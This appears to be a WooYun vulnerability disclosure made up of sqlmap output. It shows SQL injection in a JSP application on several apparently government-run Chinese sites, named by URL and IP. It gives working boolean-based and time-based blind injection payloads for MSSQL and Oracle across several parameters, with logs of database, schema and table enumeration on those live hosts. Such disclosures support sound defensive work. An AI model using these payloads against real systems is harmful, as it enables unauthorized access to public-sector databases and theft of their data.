WooYun.org

http://www.gzegn.gov.cn:8080/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359&depName=%CA%A1%C3%F1%D5%FE%CC%FC

Place: GET
Parameter: zzjgdm
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: zzjgdm=009390359' AND 4047=4047 AND 'ZDFM'='ZDFM&depName=%CA%A1%C3%F1%D5%FE%CC%FC
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: zzjgdm=009390359' AND 3874=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mJmn'='mJmn&depName=%CA%A1%C3%F1%D5%FE%CC%FC

http://www.cqspbxz.com/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009290753&depName=%C7%F8%B7%BF%B9%DC%BE%D6

Parameter: zzjgdm
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: zzjgdm=009290753' AND 2319=2319 AND 'ZTze'='ZTze&depName=%C7%F8%B7%BF%B9%DC%BE%D6
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: zzjgdm=009290753' AND 9798=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Uvqz'='Uvqz&depName=%C7%F8%B7%BF%B9%DC%BE%D6
---
[10:06:26] [INFO] testing Microsoft SQL Server
[10:06:26] [INFO] confirming Microsoft SQL Server
[10:06:28] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[10:06:28] [INFO] fetching database names
[10:06:28] [INFO] fetching number of databases
[10:06:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:06:28] [INFO] retrieved: 21

http://www.ddkspdt.com/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009286236&depName=%C7%F8%D6%CA%BC%E0%BE%D6

http://www.cqszzw.gov.cn/application/gzhd/zxzx/showZXInfo.jsp?ID=20111219175109007

Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=20111219175109007' AND 4863=4863 AND 'hsAz'='hsAz
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: ID=20111219175109007' AND 4007=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'VBTD'='VBTD
---
[00:47:43] [INFO] testing Microsoft SQL Server
[00:47:43] [INFO] confirming Microsoft SQL Server
[00:47:45] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[00:47:45] [INFO] fetching database names
[00:47:45] [INFO] fetching number of databases
[00:47:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:47:45] [INFO] retrieved: 5
[00:47:47] [INFO] retrieved: master
[00:48:03] [INFO] retrieved: model
[00:48:17] [INFO] retrieved: msdb
[00:48:30] [INFO] retrieved: tempdb
[00:48:47] [INFO] retrieved: web_shizhu

http://61.183.35.105/application/wsbs/zwugk.jsp?selectpageno=95&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2

Place: GET
Parameter: xiangmuDW
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selectpageno=95&shouliId=&xiangmuDW=%' AND 3105=3105 AND '%'='&button=%E6%9F%A5%E8%AF%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: selectpageno=95&shouliId=&xiangmuDW=%' AND 2511=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(103)||CHR(115),5) AND '%'='&button=%E6%9F%A5%E8%AF%A2
---
[12:56:54] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:56:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:56:54] [INFO] fetching database (schema) names
[12:56:54] [INFO] fetching number of databases
[12:56:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:56:54] [INFO] retrieved: 19
[12:57:35] [INFO] retrieved: CTXSYS
[13:00:49] [INFO] retrieved: DBSNMP

http://www.cqszzw.gov.cn/application/wsbs/zwugk.jsp?queryid=111

Place: GET
Parameter: queryid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: queryid=111%' AND 1542=1542 AND '%'='
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: queryid=111%' AND 3688=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
[12:41:26] [INFO] testing Microsoft SQL Server
[12:41:30] [INFO] confirming Microsoft SQL Server
[12:41:34] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[12:41:34] [INFO] fetching database names
[12:41:34] [INFO] fetching number of databases
[12:41:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:41:34] [INFO] retrieved: 5
[12:41:45] [INFO] retrieved: master
[12:43:10] [INFO] retrieved: model
[12:44:11] [INFO] retrieved: msdb
[12:45:10] [INFO] retrieved: tempdb
[12:46:22] [INFO] retrieved: web_shizhu

http://www.xazwfw.com/application/wsbs/zwugk.jsp?selectpageno=16&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2

---
Place: GET
Parameter: xiangmuDW
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selectpageno=16&shouliId=&xiangmuDW=%' AND 4085=4085 AND '%'='&button=%E6%9F%A5%E8%AF%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: selectpageno=16&shouliId=&xiangmuDW=%' AND 1823=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(100)||CHR(122),5) AND '%'='&button=%E6%9F%A5%E8%AF%A2
---
[02:23:57] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[02:23:57] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[02:23:57] [INFO] fetching database (schema) names
[02:23:57] [INFO] fetching number of databases
[02:23:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:23:57] [INFO] retrieved: 18
[02:24:26] [INFO] retrieved: CTXSYS
[02:26:44] [INFO] retrieved: DBSNMP
[02:29:00] [INFO] retrieved: DMSYS
[02:30:52] [INFO] retrieved: DZJC
[02:32:26] [INFO] retrieved: DZJC_XIANAN_HB
[02:36:45] [INFO] retrieved: EXFSYS
[02:38:53] [INFO] retrieved: MDSYS
[02:40:44] [INFO] retrieved: OLAPSYS
[02:43:03] [INFO] retrieved: ORDSYS
[02:45:17] [INFO] retrieved: OUTLN
[02:47:31] [INFO] retrieved: SCOTT
[02:49:16] [INFO] retrieved: SYS
[02:50:20] [INFO] retrieved: SYSMAN
[02:52:11] [INFO] retrieved: SYSTEM
[02:54:16] [INFO] retrieved: TSMSYS
[02:56:24] [INFO] retrieved: WMSYS
[02:58:21] [INFO] retrieved: WZ_XIANAN_HB
[03:02:26] [INFO] retrieved: XDB
available databases [18]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DZJC
[*] DZJC_XIANAN_HB
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WZ_XIANAN_HB
[*] XDB
[03:03:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xazwfw.com'

http://222.86.58.9:8088/application/jsp/resultsp.jsp?bjbh=

Place: GET
Parameter: bjbh
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: bjbh=111' AND 3031=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(79)||CHR(67)||CHR(87),5) AND 'jxlx'='jxlx
---
[13:22:25] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or 2000
web application technology: Servlet 2.4, JSP, JSP 2.0
back-end DBMS: Oracle
[13:22:25] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[13:22:25] [INFO] fetching database (schema) names
[13:22:25] [INFO] fetching number of databases
[13:22:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                              
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[13:22:41] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[13:22:44] [INFO] adjusting time delay to 1 second due to good response times
[13:22:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:22:45] [ERROR] unable to retrieve the number of databases
[13:22:45] [INFO] falling back to current database
[13:22:45] [INFO] fetching current database
[13:22:45] [INFO] resumed: GUIZHOU_DZJC
[13:22:45] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[13:22:45] [INFO] fetching tables for database: 'GUIZHOU_DZJC'
[13:22:45] [INFO] fetching number of tables for database 'GUIZHOU_DZJC'
[13:22:45] [INFO] retrieved: 10
[13:22:58] [ERROR] invalid character detected. retrying..
[13:22:58] [WARNING] increasing time delay to 2 seconds 
9
[13:23:07] [INFO] retrieved: T_JC_XZ